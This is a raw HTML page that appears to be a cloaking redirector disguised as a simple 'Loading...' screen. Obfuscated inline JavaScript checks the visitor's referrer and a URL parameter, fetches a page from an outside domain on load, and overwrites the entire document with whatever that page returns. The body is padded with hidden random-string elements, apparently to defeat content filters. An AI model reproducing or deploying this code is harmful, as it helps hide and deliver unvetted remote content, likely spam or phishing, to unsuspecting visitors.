<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GwhKLeuy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GwhKLeuy .lnnnEx2J {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GwhKLeuy .content {
            line-height: 50px;
            text-align: center
        }

        .GwhKLeuy .img {
            width: 100%
        }

        .GwhKLeuy .I2aIVT {
            text-align: center
        }

        .GwhKLeuy .I2aIVT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GwhKLeuy .I2aIVT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GwhKLeuy .I2aIVT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GwhKLeuy .I2aIVT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GwhKLeuy .I2aIVT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GwhKLeuy .I2aIVT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GwhKLeuy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FaKgJBkG2Hjuv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var g0Umd = FaKgJBkG2Hjuv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ g0Umd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ g0Umd +".html?a=share";
		}
		
        Wd9bDHee=url+"#"+new Date().getTime();
        Wd9bDHee && function() {
            $.get(Wd9bDHee, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >Xu7nMxNARaEL7mgt2Mm4Ol93hyaakr3P79eZENx6xYcfnonfNFQfL9cMkGcg3mFupsHiT6IJnbSdeUAtcGG2W4KtIsz</ul>
<b style='display:none' >Jr8v0BtseDoe2pBaFTphDBZf0w4cFsHg</b>
<p  style='display:none'>tbECjdtR6UfOxZM5lKbO0Ent4Ys10</p>
<a  href='#' style='display:none'>nLjLenn4XmNHmFsXVVrfQpOY6mLtBMqQfs3</a>
<span style='display:none'>FPUhTPfMWHYK2wn9CCxcaHkOL10cYIHAsHq6Y5VPz7QQzAYc5HMtEXXNlcu4Q7dJbPAFrqhvEqKSgP7ZaYS</span>
<b style='display:none' >Jr8v0BtseDoe2pBaFTphDBZf0w4cFsHg</b>
<ul style='display:none' >Xu7nMxNARaEL7mgt2Mm4Ol93hyaakr3P79eZENx6xYcfnonfNFQfL9cMkGcg3mFupsHiT6IJnbSdeUAtcGG2W4KtIsz</ul><div class="GwhKLeuy">
    <div class="lnnnEx2J">
        <div class="I2aIVT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<h1 style='display:none' >SciD7yoWixVpT6Q9KlihfP8jXVl4r</h1>
<b style='display:none' >nryhT2RsH2vI4cbWQTzb8ygS9YqeG2NQ17J3UVCEyR</b>
<p  style='display:none'>U3MtFu9d6t2lCnNg1Q3AgsGx51NJTjBHuxnvhVoUCls8N5D22jqY7MJGcIKb59Nj6EOKfukmoC1zuGjIADxhRi0zfm4kv</p>
<ul style='display:none' >XYrPeemYZuQKtnARnKeXdpArtgBXIa9PCjDICg9lMs2IL0oGMuqColfpOtTirm</ul>
<b style='display:none' >nryhT2RsH2vI4cbWQTzb8ygS9YqeG2NQ17J3UVCEyR</b>
<a  href='#' style='display:none'>UV8WgBL079Pj1G6TvpP1xFtOrwl0eJCXsfkiBMTeUtlewg9kAXSx</a></body>
</html>